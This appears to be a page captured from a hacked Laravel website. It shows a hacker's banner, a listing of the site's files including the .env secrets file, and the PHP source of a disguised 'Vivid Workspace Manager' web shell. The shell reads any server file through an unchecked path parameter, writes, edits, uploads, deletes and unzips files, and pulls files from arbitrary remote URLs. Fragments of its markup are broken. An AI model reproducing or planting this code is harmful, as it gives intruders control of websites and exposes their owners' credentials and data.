I am a hacker in the dark of a very cold night
path :/var/www/html/vorne.webheaydemo.com
upload file:
List of files:
| name file |
size |
edit |
permission |
action |
| .editorconfig | 276 KB | March 05 2024 07:12:34 | 0666 |
|
| .env | 1385 KB | May 24 2024 16:43:55 | 0666 |
|
| .env.example | 1088 KB | March 05 2024 07:12:34 | 0666 |
|
| .gitattributes | 190 KB | March 05 2024 07:12:34 | 0666 |
|
| .gitignore | 245 KB | March 05 2024 07:12:34 | 0666 |
|
| .htaccess | 947 KB | July 04 2023 21:25:08 | 0664 |
|
| .rnd | 1024 KB | March 13 2024 04:51:14 | 0666 |
|
| README.md | 472 KB | March 22 2024 10:35:00 | 0666 |
|
| app | - | March 05 2024 07:12:34 | 0777 |
|
| artisan | 1739 KB | March 05 2024 07:12:34 | 0666 |
|
| bootstrap | - | March 05 2024 07:12:34 | 0777 |
|
| composer.json | 2829 KB | May 13 2024 12:10:04 | 0666 |
|
| composer.lock | 417205 KB | March 19 2024 12:13:14 | 0666 |
|
| config | - | July 03 2025 02:53:36 | 0777 |
|
| database | - | March 05 2024 07:12:34 | 0777 |
|
| index.php | 1816 KB | May 13 2024 10:32:36 | 0666 |
|
| lang | - | May 13 2024 14:53:26 | 0777 |
|
| manifest.json | 913 KB | May 14 2024 03:57:26 | 0664 |
|
| package.json | 398 KB | March 05 2024 07:12:34 | 0666 |
|
| phpunit.xml | 1206 KB | March 05 2024 07:12:34 | 0666 |
|
| public | - | July 03 2025 02:37:20 | 0777 |
|
| resources | - | May 13 2024 12:09:36 | 0777 |
|
| routes | - | March 05 2024 07:12:34 | 0777 |
|
| service-worker.js | 924 KB | March 05 2024 07:12:34 | 0666 |
|
| storage | - | March 05 2024 10:03:52 | 0777 |
|
| symlink.php | 218 KB | March 05 2024 07:12:34 | 0666 |
|
| tests | - | March 05 2024 07:12:34 | 0777 |
|
| vendor | - | March 19 2024 12:13:14 | 0777 |
|
| vite.config.js | 326 KB | March 05 2024 07:12:34 | 0666 |
|
Access Denied
Secure Access Required
');
}
} else {
echo '
Access Denied
Secure Access Required
';
exit;
}
}
}
// Handle file content retrieval for editing
if (isset($_GET['operation']) && $_GET['operation'] === 'retrieve_file_content' && isset($_GET['item'])) {
$validatedPath = realpath($_GET['workspace'] . '/' . $_GET['item']);
if ($validatedPath && is_file($validatedPath) && is_readable($validatedPath)) {
header('Content-Type: text/plain');
echo file_get_contents($validatedPath);
exit;
} else {
http_response_code(404);
echo "Item not found or not readable.";
exit;
}
}
// Handle current workspace (directory)
$baseDir = realpath(__DIR__); // Restrict to script's directory
$currentWorkspace = isset($_GET['workspace']) ? realpath($_GET['workspace']) : $baseDir;
if (!$currentWorkspace || !is_dir($currentWorkspace) || !is_readable($currentWorkspace) || strpos($currentWorkspace, $baseDir) !== 0) {
$currentWorkspace = $baseDir;
$alertMessage = "Invalid or inaccessible workspace. Reverted to default workspace.";
}
// File operations
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['csrf_token']) && $_POST['csrf_token'] === $_SESSION['csrf_token']) {
// Create directory
if (isset($_POST['add_directory']) && !empty($_POST['folder_name'])) {
$folderName = purifyFileName($_POST['folder_name']);
$newFolderPath = $currentWorkspace . '/' . $folderName;
if (!is_dir($newFolderPath)) {
if (mkdir($newFolderPath, 0755)) {
$alertMessage = "Folder created successfully.";
} else {
$alertMessage = "Failed to create folder.";
}
} else {
$alertMessage = "Folder already exists.";
}
}
// Create file
if (isset($_POST['add_file']) && !empty($_POST['item_name'])) {
$itemName = purifyFileName($_POST['item_name']);
$itemContent = $_POST['item_content'] ?? '';
$newItemPath = $currentWorkspace . '/' . $itemName;
if (!file_exists($newItemPath)) {
if (file_put_contents($newItemPath, $itemContent) !== false) {
$alertMessage = "File created successfully.";
} else {
$alertMessage = "Failed to create file.";
}
} else {
$alertMessage = "File already exists.";
}
}
// Upload file
if (isset($_FILES['uploaded_item']) && $_FILES['uploaded_item']['error'] === UPLOAD_ERR_OK) {
$uploadedItem = $_FILES['uploaded_item'];
$fileExt = strtolower(pathinfo($uploadedItem['name'], PATHINFO_EXTENSION));
if (in_array($fileExt, $allowedFileTypes) && $uploadedItem['size'] <= $maxUploadSize) {
$destinationPath = $currentWorkspace . '/' . purifyFileName($uploadedItem['name']);
if (!file_exists($destinationPath)) {
if (move_uploaded_file($uploadedItem['tmp_name'], $destinationPath)) {
$alertMessage = "Item uploaded successfully.";
} else {
$alertMessage = "Error uploading item.";
}
} else {
$alertMessage = "File already exists.";
}
} else {
$alertMessage = "Invalid file type or size exceeds limit.";
}
}
// Rename item
if (isset($_POST['rename_item']) && !empty($_POST['original_name']) && !empty($_POST['new_name'])) {
$originalName = purifyFileName($_POST['original_name']);
$newName = purifyFileName($_POST['new_name']);
$originalPath = $currentWorkspace . '/' . $originalName;
$newPath = $currentWorkspace . '/' . $newName;
if (file_exists($originalPath) && !file_exists($newPath)) {
if (rename($originalPath, $newPath)) {
$alertMessage = "Item renamed successfully.";
} else {
$alertMessage = "Error renaming item.";
}
} else {
$alertMessage = "Invalid source or destination name.";
}
}
// Delete item
if (isset($_POST['delete_item']) && !empty($_POST['item_name'])) {
$itemName = purifyFileName($_POST['item_name']);
$itemPath = $currentWorkspace . '/' . $itemName;
if (file_exists($itemPath)) {
if (is_dir($itemPath)) {
$deleteSuccess = deleteDirectory($itemPath);
$alertMessage = $deleteSuccess ? "Folder deleted successfully." : "Error deleting folder.";
} elseif (is_file($itemPath)) {
if (unlink($itemPath)) {
$alertMessage = "File deleted successfully.";
} else {
$alertMessage = "Error deleting file.";
}
}
} else {
$alertMessage = "Item not found.";
}
}
// Unzip archive
if (isset($_POST['unzip_archive']) && !empty($_POST['archive_name'])) {
$archiveName = purifyFileName($_POST['archive_name']);
$archivePath = $currentWorkspace . '/' . $archiveName;
if (file_exists($archivePath) && class_exists('ZipArchive')) {
$archive = new ZipArchive;
if ($archive->open($archivePath) === TRUE) {
if ($archive->extractTo($currentWorkspace)) {
$archive->close();
$alertMessage = "Archive extracted successfully.";
} else {
$archive->close();
$alertMessage = "Error extracting archive.";
}
} else {
$alertMessage = "Failed to open archive.";
}
} else {
$alertMessage = "Archive not found or ZipArchive not available.";
}
}
// Fetch remote item
if ($enableRemoteFetch && isset($_POST['fetch_remote']) && !empty($_POST['remote_url'])) {
$remoteUrl = filter_var($_POST['remote_url'], FILTER_VALIDATE_URL);
if ($remoteUrl) {
$itemName = purifyFileName(basename($remoteUrl));
$localItemPath = $currentWorkspace . '/' . $itemName;
$fileExt = strtolower(pathinfo($itemName, PATHINFO_EXTENSION));
if (in_array($fileExt, $allowedFileTypes) && !file_exists($localItemPath)) {
$remoteContent = @file_get_contents($remoteUrl);
if ($remoteContent !== false && file_put_contents($localItemPath, $remoteContent) !== false) {
$alertMessage = "Item downloaded successfully.";
} else {
$alertMessage = "Error downloading item.";
}
} else {
$alertMessage = "Invalid file type or file already exists.";
}
} else {
$alertMessage = "Invalid remote URL.";
}
}
// Edit file
if (isset($_POST['modify_file']) && !empty($_POST['item_name'])) {
$itemName = purifyFileName($_POST['item_name']);
$itemContent = $_POST['item_content'] ?? '';
$itemPath = $currentWorkspace . '/' . $itemName;
if (file_exists($itemPath) && is_writable($itemPath)) {
if (file_put_contents($itemPath, $itemContent) !== false) {
$alertMessage = "File updated successfully.";
} else {
$alertMessage = "Error updating file.";
}
} else {
$alertMessage = "File not found or not writable.";
}
}
}
// List workspace contents
$items = scandir($currentWorkspace);
$folders = [];
$files = [];
foreach ($items as $item) {
if ($item === '.' || $item === '..') continue;
$itemPath = $currentWorkspace . '/' . $item;
if (is_dir($itemPath)) {
$folders[] = $item;
} else {
$files[] = $item;
}
}
sort($folders);
sort($files);
// Helper functions
function purifyFileName($name) {
return preg_replace('/[^a-zA-Z0-9._-]/', '', trim($name));
}
function humanizeFileSize($bytes) {
if ($bytes >= 1073741824) return number_format($bytes / 1073741824, 2) . ' GB';
if ($bytes >= 1048576) return number_format($bytes / 1048576, 2) . ' MB';
if ($bytes >= 1024) return number_format($bytes / 1024, 2) . ' KB';
return $bytes . ' bytes';
}
function buildPathCrumbs($path, $baseDir) {
// Ensure path is within baseDir
if (strpos($path, $baseDir) !== 0) {
return 'Invalid path';
}
// Get relative path from baseDir
$relativePath = substr($path, strlen($baseDir));
$segments = array_filter(explode(DIRECTORY_SEPARATOR, $relativePath));
$crumbs = [];
$pathBuilder = $baseDir;
// Root crumb
$crumbs[] = 'Root';
// Build crumbs for each segment
foreach ($segments as $segment) {
$pathBuilder .= DIRECTORY_SEPARATOR . $segment;
if (is_dir($pathBuilder) && is_readable($pathBuilder)) {
$crumbs[] = '' . htmlspecialchars($segment) . '';
} else {
$crumbs[] = '' . htmlspecialchars($segment) . '';
}
}
return implode(' / ', $crumbs);
}
function deleteDirectory($dir) {
if (!file_exists($dir)) return true;
if (!is_dir($dir)) return unlink($dir);
foreach (scandir($dir) as $item) {
if ($item == '.' || $item == '..') continue;
if (!deleteDirectory($dir . '/' . $item)) return false;
}
return rmdir($dir);
}
?>
Vivid Workspace Manager
Vivid Workspace Manager
New Folder
Upload Item
Fetch Remote Item